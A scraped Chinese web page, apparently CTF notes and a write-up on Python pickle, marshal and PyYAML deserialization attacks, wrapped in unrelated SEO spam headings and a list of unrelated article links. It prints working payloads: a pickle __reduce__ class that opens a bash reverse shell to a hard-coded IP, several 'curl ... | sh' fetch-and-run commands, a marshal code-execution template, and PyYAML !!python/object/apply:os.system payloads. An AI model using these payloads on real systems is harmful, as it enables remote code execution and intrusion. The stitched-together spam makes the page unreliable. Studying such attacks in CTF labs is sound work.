当前位置: 首页 > news >正文

业之峰装饰公司装修每平米价格淄博网站制作优化

业之峰装饰公司装修每平米价格,淄博网站制作优化,发布信息的网站,分分彩做号网站笔记 【python反序列化】 序列化 类对象-字节流#xff08;字符串#xff09; 反序列化 字节流-对象 python反序列化没PHP这么灵活#xff0c;没这么多魔术方法。 import pickle import os class ctfshow(): def init(self): self.username0 self.password0 d…笔记 【python反序列化】 序列化 类对象-字节流字符串 反序列化 字节流-对象 python反序列化没PHP这么灵活没这么多魔术方法。 import pickle import os class ctfshow(): def init(self): self.username0 self.password0 def login(self,username,password):return usernameadmin and password123456cctfshow() datac.login(“admin”,“123456”) #返回True print(data) import pickle import os import base64 class ctfshow(): def init(self): self.username0 self.password0 def login(self,username,password):return usernameadmin and password123456#相当于PHP里面的__wakeup() #返回值第一个元素是 回调函数第二个元素是回调函数的参数。 #第二个元素是一个元组包含两个及以上元素。 def __reduce__(self):print(reduce)return os.system,(bash -i /dev/tcp/120.46.41.173/9023 01,)​ ​ cctfshow() #序列化生成字节流。这种方式直接CV容易丢失不可见字符。 #serialize pickle.dumps© #输出base64编码后的paylaod可以CV。 #print(base64.b64encode(serialize)) #反序列化执行命令 #pickle.loads(serialize) #写入文件 with open(“ctfshow.ser”,“wb”) as f: pickle.dump(c,f) with open(“ctfshow.ser”,“rb”) as f: pickle.load(f) 注意点 向服务端传入payload如果出现报错如【ModuleNotFoundError: No module named ‘nt’】 遇到这种情况是因为自己的操作系统和服务器的操作系统不一致。 服务端如果是linux我们的序列化字符串payload 也得在linux操作系统里面生成。 python序列化常用的模板 //例题93 1 pickle 2 json 【特征】 竟然不需要 恶意类 反序列化字符串里面包含类的所有定义包括类的方法 php反序列化时只能控制类的属性利用现有的魔术方法做跳板 python反序列化时直接可以不需要恶意类也不需要现有的魔术方法直接产生类的定义并执行__reduce__方法 Marshal 反序列化 pickle 类无法序列化 code类为了弥补这个问题2.6以后增加了marshal模块来处理 模板 import base64 import pickle import marshal def foo(): import os os.system(‘whoami;/bin/sh’) # evil code shell “”“ctypes FunctionType (cmarshal loads (cbase64 b64decode (S’%s’ tRtRc__builtin__ globals (tRS’’ tR(tR.”“” % base64.b64encode(marshal.dumps(foo.func_code)) print(pickle.loads(shell)) PyYAML 反序列化 //例题94 !!python/object 标签 !!python/object/new 标签 !!python/object/apply 标签 payload data!!python/object/apply:os.system [“curl https://your-shell.com/43.154.107.226:3389 |sh”] 题解wp web93 题目要求我们在/unserialize路由POST提交一个参数datadata经过base64编码。 不知道题目的考点先传参dataMQ看看报错。MQ是1的base64编码。 发现了关键代码pickle反序列化。pytohn版本是3.8 #base64解码传进来的值并且赋值给data data base64.b64decode(request.form[data]) #反序列化data数据 pickle.loads(data) #返回反序列化结束提示 return unserialize done request.form[data]生成payload的脚本 import pickle import os import base64class ctfshow():def __init__(self):self.username0self.password0#相当于PHP里面的__wakeup()#返回值第一个元素是 回调函数第二个元素是回调函数的参数。#第二个元素是一个元组包含两个及以上元素。def __reduce__(self):print(reduce)#弹shellreturn (os.system,(curl https://your-shell.com/vps-ip:port | sh,))cctfshow()#序列化生成字节流。这种方式直接CV容易丢失不可见字符。 serialize pickle.dumps(c) #输出base64编码后的paylaod可以CV。 print(base64.b64encode(serialize))#反序列化执行命令 #pickle.loads(serialize)#写入文件 #with open(ctfshow.ser,wb) as f: # pickle.dump(c,f) #with open(ctfshow.ser,rb) as f: # pickle.load(f)注意点 向服务端传入payload如果出现报错如**【ModuleNotFoundError: No module named ‘nt’】** 遇到这种情况是因为自己的操作系统和服务器的操作系统不一致。 服务端如果是linux我们的序列化字符串payload 也得在linux操作系统里面生成。 同时python版本也需要一致。 KALI是linux在KALI里面生成payload。 那就又来了一个注意点 一开始一直报错 partially initialized module pickle has no attribute dumps (most likely due to a circular import) 尝试过重装pickle库、重装pip都没用。后来发现是文件名和pickle库的名字重了文件名不能是pickle.py。 经过尝试服务端应该是把nc和bash两个命令给ban了只能用平台来弹shell。 web94 题目明显提示是python中的PyYAML 反序列化。 PyYAML 反序列化利用方面危险标签有三种。 !!python/object 标签 !!python/object/new 标签 !!python/object/apply 标签这次还是选择使用平台来反弹shell估计还是把nc和bash两个命令给ban了。 经过尝试能用的危险标签是!!python/object/new和!!python/object/apply payload data!!python/object/new:os.system [curl https://your-shell.com/vps-ip:port |sh]data!!python/object/apply:os.system [curl https://your-shell.com/vps-ip:port |sh]直接拿flag了。
http://wiki.neutronadmin.com/news/37883/

相关文章:

  • 帝国+只做网站地图重庆人居建设集团网站
  • 为什么网站在本地看没问题上传之后没有内容呢?搬搬屋源码网
  • 阳江网站制作公司阿里巴巴国际站做2个网站有用
  • 网站推广与维护设计方案百度竞价员
  • 亚马逊关键词排名查询工具徐州整站优化
  • 成都家具网站建设wordpress英文
  • 大型门户网站有哪些作风建设提升年活动网站
  • 化妆品网站制作需要中企动力邮箱app
  • 专业制作网站装修公司电话号码大全
  • 网站后缀co注册公司代理记账费用
  • 站长做旅游网站上海十大公司排名
  • 网站页面优化简单吗学校网站怎么做
  • jquery素材网站网站建设的基本需求有哪些
  • 制作一个网站能多少钱链接缩短网址
  • 自己建设网站步骤产品外观设计的重要性
  • 哪些网站容易做三星网上商城打不开
  • 有些网站做不了seo山东省建设厅网站维护电话
  • 云南网站建设维修公司wordpress 分享 可见
  • 个人网站的建设目标百度托管公司
  • 公司 网站建正规的拼多多运营哪里找
  • 可以做内容的网站网站建设好后 如何验收
  • 怎样做才能让百度搜到网站产品电子商务网站搭建方案
  • 资讯平台网站模板网站建设虚拟空间
  • 网站不备案可以做百度竞价吗神童预言新冠2023结束
  • 赣州网站建设效果网站的flash怎么做的
  • 网站后台数据处理编辑主要是做什么的啊网络营销外包推广系统
  • 网站建设课程设计报告php那非西
  • 有一个做场景动画的网站电商网站公司
  • 网站app搭建短视频代运营费用明细
  • 怎么刷网站权重公司小程序怎么制作